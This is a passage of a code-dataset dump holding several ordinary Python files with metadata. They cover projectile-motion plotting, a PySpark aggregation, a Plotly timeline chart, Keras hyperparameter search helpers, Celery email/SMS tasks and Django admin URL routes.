"tweepy.Stream", "line_number": 29, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 32, "usage_type": "call"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "time.time", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "36813498874", "text": "import matplotlib.pyplot as plt\nfrom matplotlib.transforms import Bbox\nimport numpy as np\nfrom scipy.optimize import minimize\nimport seaborn as sns\n\n# Accepting only numeric input from the user\ndef check_numeric(value):\n \"\"\"Checks if a string value is numeric and converts it to int or float\"\"\"\n while True:\n try:\n value = int(value)\n break\n except ValueError:\n try: \n value = float(value)\n break\n except ValueError:\n value = input(\"Please, enter a numerical value: \")\n return value\n \n# Receiving initial values from the user\nv_0 = check_numeric(input(\"Enter initial velocity [m/s]: \"))\nangle_degrees = check_numeric(input(\"Enter angle of launch [deg]: \"))\nangle = angle_degrees*(np.pi/180)\nheight = check_numeric(input(\"Enter initial height [m]: \"))\n\n# Projectile motion functions\ndef t_flight(v_0, angle, height, g=9.81):\n \"\"\"Returns time of flight\"\"\"\n tf = (v_0*np.sin(angle)+((v_0*np.sin(angle))**2+2*g*height)**0.5)/g\n return tf\n\ndef h_range(v_0, angle, height, g=9.81):\n \"\"\"Returns horizontal range\"\"\"\n h = v_0*np.cos(angle)*t_flight(v_0, angle, height, g)\n return h\n\ndef y(x, g=9.81):\n \"\"\"Returns the height at any point of the motion\"\"\"\n y = np.tan(angle)*x-(g*(x**2))/(2*(v_0*np.cos(angle))**2)+height\n return y\n\ntime_of_flight = t_flight(v_0, angle, height)\nhorizontal_range = h_range(v_0, angle, height)\nx = np.linspace(0, horizontal_range, 100)\nh = y(x)\n\nguess = np.array([1])\nmax_x = minimize(lambda x: -y(x),guess)\nmax_y = y(max_x.x[0]) \n\n# Set color palette\nsns.set_style('darkgrid')\n\n# Plotting figure\nplt.figure(num=1, dpi=120, figsize=(9,6))\nplt.plot(x,h,'b')\nplt.title('Projectile Motion',\n color='k',\n fontweight='bold',\n fontname='Century Gothic',\n size=18)\nplt.xlabel('Distance [m]',\n fontweight='bold',\n fontname='Century Gothic',\n size=14)\nplt.ylabel('Height [m]',\n fontweight='bold',\n fontname='Century Gothic',\n size=14)\nplt.plot(horizontal_range,0, marker='D', color='r')\nplt.plot(max_x.x[0],max_y, marker='D', color='g')\nplt.annotate(f'Max range\\n {round(horizontal_range,2)} [m]',\n xy=(horizontal_range,0),\n xytext=(0.865,0.725),\n xycoords='data',\n textcoords='axes fraction',\n weight='bold',\n fontname='Century Gothic',\n arrowprops=dict(arrowstyle='<|-',\n connectionstyle='arc3',\n edgecolor='r',\n facecolor='r'),\n bbox=dict(facecolor='w', edgecolor='r', boxstyle='round'))\nplt.annotate(f'Time of flight\\n {round(time_of_flight,2)} [s]',\n xy=(0.865,0.825),\n xycoords='axes fraction',\n weight='bold',\n fontname='Century Gothic',\n bbox=dict(facecolor='w', edgecolor='b', boxstyle='round'))\nplt.annotate(f'Max height\\n x: {round(max_x.x[0],2)} [m]; y: {round(max_y,2)} [m]',\n xy=(max_x.x[0],max_y),\n xytext=(0.735,0.925),\n xycoords='data',\n textcoords='axes fraction',\n weight='bold',\n fontname='Century Gothic',\n arrowprops=dict(arrowstyle='<|-',\n connectionstyle='arc3',\n edgecolor='g',\n facecolor='g'),\n bbox=dict(facecolor='w', edgecolor='g', boxstyle='round'))\nplt.show()", "repo_name": "yarib97/Projectile_Motion", "sub_path": "Projectile_Motion.py", "file_name": "Projectile_Motion.py", "file_ext": "py", "file_size_in_byte": 3504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.pi", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.tan", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 50, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}]} +{"seq_id": "19808534882", "text": "import sys\nfrom csv import reader\nfrom pyspark import SparkContext\nfrom decimal import Decimal\n\nif __name__ == \"__main__\":\n sc = SparkContext()\n lines = sc.textFile(sys.argv[1], 1)\n lines = lines.mapPartitions(lambda x: reader(x))\n res1 = lines.map(lambda x: (x[2],(0 if int(x[1][-2:]) in (5,6,12,13,19,20,26,27) else 1)))\n res2 = res1.reduceByKey(lambda x, y: x + y)\n res3 = lines.map(lambda x: (x[2],(1 if int(x[1][-2:]) in (5,6,12,13,19,20,26,27) else 0))) \n res4 = res3.reduceByKey(lambda x, y: x + y)\n \n res5 = res2.map(lambda x: (x[0], Decimal(Decimal(x[1])/23).quantize(Decimal('.01'))))\n res6 = res4.map(lambda x: (x[0], Decimal(Decimal(x[1])/8).quantize(Decimal('.01'))))\n res6.fullOuterJoin(res5).map(lambda x: (x[0],x[1][0],x[1][1])).map(lambda x: \"{0}\\t{1}, {2}\".format(x[0], x[1], x[2])).saveAsTextFile(\"task7.out\")\n sc.stop()\n\n", "repo_name": "bene802/BigData", "sub_path": "Spark/task7.py", "file_name": "task7.py", "file_ext": "py", "file_size_in_byte": 878, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyspark.SparkContext", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 9, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 15, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "74124303555", "text": "\"\"\"R daattali/TimeVis-like charts for displaying chronological data.\n\nSee daattali/TimeVis: https://github.com/daattali/timevis\n\n# NOTE: Consider automated (non-overlapping) text/event placement\n\n- MATLAB Adjust Text: https://github.com/Phlya/adjustText\n- D3 Labeler: https://github.com/tinker10/D3-Labeler\n- Plotly has implementation for contour? https://github.com/plotly/plotly.js/issues/4674#issuecomment-603571483\n\n\"\"\"\n\nimport numpy as np\nimport plotly.graph_objects as go\n\nfrom .utils_data import DASHED_TIME_FORMAT_YEAR, GDP_TIME_FORMAT, format_unix, get_unix\nfrom .utils_fig import CustomChart\n\n\nclass TimeVisChart(CustomChart): # noqa: H601\n \"\"\"Time Vis Chart: resource use timeline.\"\"\"\n\n date_format = DASHED_TIME_FORMAT_YEAR\n \"\"\"Date format for bar chart. Default is `DASHED_TIME_FORMAT_YEAR`.\"\"\"\n\n fillcolor = '#D5DDF6'\n \"\"\"Default fillcolor for time vis events.\"\"\"\n\n hover_label_settings = {'bgcolor': 'white', 'font_size': 12, 'namelength': 0}\n \"\"\"Plotly hover label settings.\"\"\"\n\n rh = 1\n \"\"\"Height of each rectangular time vis.\"\"\"\n\n y_space = -1.5 * rh\n \"\"\"Vertical spacing between rectangles.\"\"\"\n\n categories = None\n \"\"\"List of string category names set in self.create_traces().\"\"\"\n\n _shapes = []\n \"\"\"List of shapes for plotly layout.\"\"\"\n\n def create_traces(self, df_raw): # noqa: CCR001\n \"\"\"Return traces for plotly chart.\n\n Args:\n df_raw: pandas dataframe with columns: `(category, label, start, end)`\n\n Returns:\n list: Dash chart traces\n\n \"\"\"\n # Get all unique category names and create lookup for y positions\n self.categories = sorted(cat for cat in set(df_raw['category'].tolist()) if cat)\n y_pos_lookup = {cat: self.y_space * idx for idx, cat in enumerate(self.categories)}\n # Create the Time Vis traces\n traces = []\n self._shapes = []\n self._annotations = []\n for vis in df_raw.itertuples():\n if vis.category in y_pos_lookup:\n y_pos = y_pos_lookup[vis.category]\n if vis.end:\n traces.append(self._create_time_vis_shape(vis, y_pos))\n if vis.label:\n traces.append(self._create_annotation(vis, y_pos))\n else:\n traces.append(self._create_event(vis, y_pos))\n else:\n y_pos = 0\n traces.append(self._create_non_cat_shape(vis, y_pos))\n return traces\n\n def _create_hover_text(self, vis):\n \"\"\"Return hover text for given trace.\n\n Args:\n vis: row tuple from df_raw with: `(category, label, start, end)`\n\n Returns:\n string: HTML-formatted hover text\n\n \"\"\"\n new_format = f'%a, {GDP_TIME_FORMAT}'\n start_date = format_unix(get_unix(vis.start, self.date_format), new_format)\n if vis.end:\n end_date = format_unix(get_unix(vis.end, self.date_format), new_format)\n date_range = f'Start: {start_date}End: {end_date}'\n else:\n date_range = f'Event: {start_date}'\n return f'{vis.category}{vis.label}{date_range}'\n\n def _create_non_cat_shape(self, vis, y_pos):\n \"\"\"Create non-category time visualization (vertical across all categories).\n\n Note: background shape is set below a transparent trace so that hover works\n\n Args:\n vis: row tuple from df_raw with: `(category, label, start, end)`\n y_pos: top y-coordinate of vis\n\n Returns:\n trace: single Dash chart Scatter trace\n\n \"\"\"\n bot_y = self.y_space * len(self.categories)\n self._shapes.append(\n go.layout.Shape(\n fillcolor=self.fillcolor,\n layer='below',\n line={'width': 0},\n opacity=0.4,\n type='rect',\n x0=vis.start,\n x1=vis.end,\n xref='x',\n y0=bot_y,\n y1=y_pos,\n yref='y',\n ),\n )\n return go.Scatter(\n fill='toself',\n opacity=0,\n hoverlabel=self.hover_label_settings,\n line={'width': 0},\n mode='lines',\n text=self._create_hover_text(vis),\n x=[vis.start, vis.end, vis.end, vis.start, vis.start],\n y=[y_pos, y_pos, bot_y, bot_y, y_pos],\n )\n\n def _create_time_vis_shape(self, vis, y_pos):\n \"\"\"Create filled rectangle for time visualization.\n\n Args:\n vis: row tuple from df_raw with: `(category, label, start, end)`\n y_pos: top y-coordinate of vis\n\n Returns:\n trace: single Dash chart Scatter trace\n\n \"\"\"\n return go.Scatter(\n fill='toself',\n fillcolor=self.fillcolor,\n hoverlabel=self.hover_label_settings,\n line={'width': 0},\n mode='lines',\n text=self._create_hover_text(vis),\n x=[vis.start, vis.end, vis.end, vis.start, vis.start],\n y=[y_pos, y_pos, y_pos - self.rh, y_pos - self.rh, y_pos],\n )\n\n def _create_annotation(self, vis, y_pos):\n \"\"\"Add vis label to chart as text overlay.\n\n Args:\n vis: row tuple from df_raw with: `(category, label, start, end)`\n y_pos: top y-coordinate of vis\n\n Returns:\n trace: single Dash chart Scatter trace\n\n \"\"\"\n return go.Scatter(\n hoverlabel=self.hover_label_settings,\n hovertemplate=self._create_hover_text(vis) + '',\n hovertext=self._create_hover_text(vis),\n mode='text',\n text=vis.label,\n textposition='middle right',\n x=[vis.start],\n y=[y_pos - self.rh / 2],\n )\n\n def _create_event(self, vis, y_pos):\n \"\"\"Create singular event with vertical line, marker, and text.\n\n If label is longer than 10 characters, then the annotation is shown offset with an arrow.\n\n Args:\n vis: row tuple from df_raw with: `(category, label, start, end)`\n y_pos: top y-coordinate of vis\n\n Returns:\n trace: single Dash chart Scatter trace\n\n \"\"\"\n if len(vis.label) > 10:\n self._annotations.append({\n 'align': 'right',\n 'arrowcolor': self.fillcolor,\n 'showarrow': True,\n 'arrowhead': 2,\n 'text': vis.label,\n 'x': vis.start,\n 'xanchor': 'right',\n 'y': y_pos - self.rh / 2,\n 'yanchor': 'middle',\n })\n self._shapes.append(\n go.layout.Shape(\n layer='below',\n line={\n 'color': self.fillcolor,\n 'dash': 'longdashdot',\n 'width': 2,\n },\n type='line',\n x0=vis.start,\n x1=vis.start,\n xref='x',\n y0=self.y_space * len(self.categories),\n y1=y_pos - self.rh / 2,\n yref='y',\n ),\n )\n return go.Scatter(\n hoverlabel=self.hover_label_settings,\n hovertemplate=self._create_hover_text(vis) + '',\n hovertext=self._create_hover_text(vis),\n marker={'color': self.fillcolor},\n mode='markers+text',\n text='' if len(vis.label) > 10 else vis.label,\n textposition='top center',\n x=[vis.start],\n y=[y_pos - self.rh / 2],\n )\n\n def create_layout(self):\n \"\"\"Extend the standard layout.\n\n Returns:\n dict: layout for Dash figure\n\n \"\"\"\n layout = super().create_layout()\n # Set YAxis tick marks for category names (https://plotly.com/python/tick-formatting)\n layout['yaxis']['tickmode'] = 'array'\n layout['yaxis']['tickvals'] = np.subtract(\n np.multiply(\n np.array(range(len(self.categories))),\n self.y_space,\n ),\n self.rh / 2,\n )\n layout['yaxis']['ticktext'] = [*self.categories]\n layout['yaxis']['zeroline'] = False\n # Hide legend\n layout['legend'] = {}\n layout['showlegend'] = False\n # Add shapes and append new annotations\n layout['shapes'] = self._shapes\n layout['annotations'] += self._annotations\n return layout\n", "repo_name": "KyleKing/dash_charts", "sub_path": "dash_charts/time_vis_chart.py", "file_name": "time_vis_chart.py", "file_ext": "py", "file_size_in_byte": 8579, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "61", "api": [{"api_name": "utils_fig.CustomChart", "line_number": 20, "usage_type": "name"}, {"api_name": "utils_data.DASHED_TIME_FORMAT_YEAR", "line_number": 23, "usage_type": "name"}, {"api_name": "utils_data.GDP_TIME_FORMAT", "line_number": 85, "usage_type": "name"}, {"api_name": "utils_data.format_unix", "line_number": 86, "usage_type": "call"}, {"api_name": "utils_data.get_unix", "line_number": 86, "usage_type": "call"}, {"api_name": "utils_data.format_unix", "line_number": 88, "usage_type": "call"}, {"api_name": "utils_data.get_unix", "line_number": 88, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout.Shape", "line_number": 109, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout", "line_number": 109, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 109, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 123, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 123, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 145, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 145, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 167, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 167, "usage_type": "name"}, {"api_name": "plotly.graph_objects.layout.Shape", "line_number": 204, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout", "line_number": 204, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 204, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 220, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 220, "usage_type": "name"}, {"api_name": "numpy.subtract", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 244, "usage_type": "call"}]} +{"seq_id": "4733339105", "text": "import numpy as np\nfrom joblib import Parallel, delayed\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.preprocessing import OneHotEncoder\nfrom tqdm import tqdm\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint\nfrom sklearn.model_selection import RandomizedSearchCV, GridSearchCV, StratifiedKFold\nimport pandas as pd\nimport os\nimport tensorflow as tf\n\n\ndef append_confidence_score(data, labels):\n\n confidence_score = np.zeros(data.shape)\n confidence_score[:, :, 1:, :, :] = (data[:, :, 1:, :, :] - data[:, :, :-1, :, :])**2\n confidence_score = np.cumsum(confidence_score, axis=2)\n\n return np.concatenate([data, confidence_score], axis=1)\n\n\ndef interpolate_frames(data, labels):\n\n # interpolate and bring the data to the same length\n print(\"Interpolating frames\")\n\n for i in tqdm(range(data.shape[0])):\n length = labels.iloc[i]['length']\n data[i] = np.apply_along_axis(lambda x: np.interp(np.linspace(0, length, data.shape[2]), np.arange(length), x[:length]), 1, data[i]) \n \n return data\n\n\ndef randomized_search(model, param_grid, X, y, **kwargs):\n\n reduce_lr = ReduceLROnPlateau(monitor='loss', patience=50, factor=0.8, min_lr=0.000001)\n random_search = RandomizedSearchCV(estimator=model, param_distributions=param_grid, n_iter=100, n_jobs=8, cv=3, verbose=10)\n random_search.fit(X, y, callbacks=[reduce_lr], **kwargs)\n return random_search\n\n\ndef grid_search(model, param_grid, X, y, **kwargs):\n\n reduce_lr = ReduceLROnPlateau(monitor='loss', patience=50, verbose=1, factor=0.8, min_lr=0.000001)\n grid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-2, cv=3, verbose=10) \n return grid.fit(X, y, callbacks=[reduce_lr], verbose=0, **kwargs)\n\n\ndef cross_validate(model, n_epochs, batch_size):\n\n skf = StratifiedKFold(n_splits=5)\n out = Parallel(n_jobs=5, verbose=100)(delayed(train)(model, train_index, test_index, epochs=n_epochs, batch_size=batch_size) for train_index, test_index in list(skf.split(X, y)))\n\n return out\n\n\ndef output_grid_search(build_model, param_grid):\n\n model = KerasClassifier(build_fn=build_model, verbose=1)\n search_result = grid_search(model, param_grid, X, y)\n\n print(\"Best: %f using %s\" % (search_result.best_score_, search_result.best_params_))\n\n params = search_result.cv_results_['params']\n mean_test_score = search_result.cv_results_['mean_test_score']\n std_test_score = search_result.cv_results_['std_test_score']\n\n for params, mean, std in zip(params, mean_test_score, std_test_score):\n print(\"%f (%f) with: %r\" % (mean, std, params))\n\n return search_result\n\n\ndef output_random_search(build_model, param_grid):\n\n model = KerasClassifier(build_fn=build_model, verbose=1)\n search_result = randomized_search(model, param_grid, X, y)\n\n print(\"Best: %f using %s\" % (search_result.best_score_, search_result.best_params_))\n means = search_result.cv_results_['mean_test_score']\n stds = search_result.cv_results_['std_test_score']\n params = search_result.cv_results_['params']\n\n for mean, stdev, param in sorted(zip(means, stds, params), key=lambda x: x[0])[::-1]:\n print(\"%f (%f) with: %r\" % (mean, stdev, param))\n\n return search_result\n\n\ndef load_data(labels, path_data, path_labels_df):\n\n print(\"Loading data (takes less than a minute)\")\n\n labels_df = pd.read_csv(path_labels_df)\n idx = labels_df.loc[labels_df['label'].astype(int).isin(labels)].index\n labels_df = labels_df.loc[idx]\n\n data = np.load(path_data).astype(np.float64)[idx]\n\n one_hot_encoder = OneHotEncoder(sparse=False)\n y = one_hot_encoder.fit_transform(labels_df.loc[idx, 'label'].to_numpy().reshape(-1, 1))\n\n return data, y\n", "repo_name": "RemyMess/MMVRC_ICCV_2021_Skeleton_based_Action_Recognition", "sub_path": "src/algos/logsigrnn/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 3737, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 19, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.apply_along_axis", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 29, "usage_type": "call"}, {"api_name": "keras.callbacks.ReduceLROnPlateau", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 37, "usage_type": "call"}, {"api_name": "keras.callbacks.ReduceLROnPlateau", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 51, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 52, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.wrappers.scikit_learn.KerasClassifier", "line_number": 59, "usage_type": "call"}, {"api_name": "keras.wrappers.scikit_learn.KerasClassifier", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "72921568194", "text": "import os\nfrom celery import Celery\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\nfrom twilio.rest import Client\n\nCELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL'),\nCELERY_RESULT_BACKEND = os.environ.get('CELERY_RESULT_BACKEND')\nSENDGRID_API_KEY = os.environ.get('SENDGRID_API_KEY')\nTWILIO_ACCOUNT_SID = os.environ.get('TWILIO_ACCOUNT_SID')\nTWILIO_AUTH_TOKEN = os.environ.get('TWILIO_AUTH_TOKEN')\nTWILIO_PHONE_NUMBER = os.environ.get('TWILIO_PHONE_NUMBER')\n\ncelery = Celery('tasks', broker=CELERY_BROKER_URL, backend=CELERY_RESULT_BACKEND)\ntwilio_client = Client(TWILIO_ACCOUNT_SID, TWILIO_AUTH_TOKEN)\n\n@celery.task(name=\"tasks.email\")\ndef send_email(email, subject, message):\n message = Mail(\n from_email=\"addr@example.com\",\n to_emails=email,\n subject=subject,\n html_content=f'{message}'\n )\n try:\n sg = SendGridAPIClient(SENDGRID_API_KEY)\n response = sg.send(message)\n return response.status_code\n except Exception as e:\n print(e)\n return \"Error sending email\"\n\n@celery.task(name=\"tasks.text_message\")\ndef send_text(number, message):\n text_message = twilio_client.messages.create(\n body=message,\n from_=f\"+{TWILIO_PHONE_NUMBER}\",\n to=number\n )\n return text_message.sid\n", "repo_name": "leepuppychow/address_book", "sub_path": "server/celery-queue/tasks.py", "file_name": "tasks.py", "file_ext": "py", "file_size_in_byte": 1258, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ.get", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "celery.Celery", "line_number": 14, "usage_type": "call"}, {"api_name": "twilio.rest.Client", "line_number": 15, "usage_type": "call"}, {"api_name": "sendgrid.helpers.mail.Mail", "line_number": 19, "usage_type": "call"}, {"api_name": "sendgrid.SendGridAPIClient", "line_number": 26, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 17, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "28251479043", "text": "from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\nfrom .views import Login, Dashboard, NotificationView, UsersList, TransactionView, TermsAndConditionView, \\\n UpdateTermsAndCondition, SetAdminNotificationSetting, GetAdminNotificationSetting, SendNotification, \\\n UpdateContactUsView, UpdatePrivacyPolicyView, CreateCoinPlan, ListCoinPlan, UpdateCoinPlan, CoinPlanDetail, \\\n NotificationCount, ReadNotifications, UserDetail, CreateUser, BlockUnblockUser, UserDelete\n\napp_name = 'adminpanel'\n\nurlpatterns = [\n path('login/', Login.as_view(), name='login'),\n path('dashboard/', Dashboard.as_view(), name='dashboard'),\n path('notification/', NotificationView.as_view(), name='notification'),\n path('users-list/', UsersList.as_view(), name='users-list'),\n path('user-delete//', UserDelete.as_view(), name='user-delete'),\n path('block-unblock-user//', BlockUnblockUser.as_view(), name='block-unblock-user'),\n path('transaction/', TransactionView.as_view(), name='transaction'),\n path('terms-and-condition/', TermsAndConditionView.as_view(), name='terms-and-condition'),\n path('update-terms-and-condition//', UpdateTermsAndCondition.as_view(),\n name='update-terms-and-condition'),\n path('notification-setting/', SetAdminNotificationSetting.as_view(),\n name='notification-setting'),\n path('get-notification-setting/', GetAdminNotificationSetting.as_view(),\n name='get-notification-setting'),\n path('send-notification/', SendNotification.as_view(),\n name='send-notification'),\n path('update-contact-us//',\n UpdateContactUsView.as_view(), name='update-contact-us'),\n path('update-privacy-policy//',\n UpdatePrivacyPolicyView.as_view(), name='update-privacy-policy'),\n path('create-coin-plan/', CreateCoinPlan.as_view(), name='create-coin-plan'),\n path('coin-plan-list/', ListCoinPlan.as_view(), name='coin-plan-list'),\n path('update-coin-plan//', UpdateCoinPlan.as_view(), name='update-coin-plan'),\n path('coin-plan-detail//', CoinPlanDetail.as_view(), name='coin-plan-detail'),\n path('user-detail//', UserDetail.as_view(), name='user-detail'),\n path('notification-count/', NotificationCount.as_view(),\n name='notification-count'),\n path('read-notification/', ReadNotifications.as_view(),\n name='read-notification'),\n path('user-create/', CreateUser.as_view(), name='user-create')\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n# if settings.DEBUG:\n# urlpatterns += static(settings.MEDIA_URL,\n# document_root=settings.MEDIA_ROOT)\n# urlpatterns += static(settings.STATIC_URL,\n# document_root=settings.STATIC_ROOT)\n", "repo_name": "choudharyamit26/Cipher", "sub_path": "adminpanel/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "views.Login.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "views.Login", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "views.Dashboard.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "views.Dashboard", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "views.NotificationView.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "views.NotificationView", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "views.UsersList.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "views.UsersList", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.UserDelete.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "views.UserDelete", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.BlockUnblockUser.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.BlockUnblockUser", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "views.TransactionView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "views.TransactionView", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "views.TermsAndConditionView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "views.TermsAndConditionView", "line_number": 19, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "views.UpdateTermsAndCondition.as_view", "line_number": 20, "usage_type": "call"}, {"api_name": "views.UpdateTermsAndCondition", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "views.SetAdminNotificationSetting.as_view", "line_number": 22, "usage_type": "call"}, {"api_name": "views.SetAdminNotificationSetting", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "views.GetAdminNotificationSetting.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "views.GetAdminNotificationSetting", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, 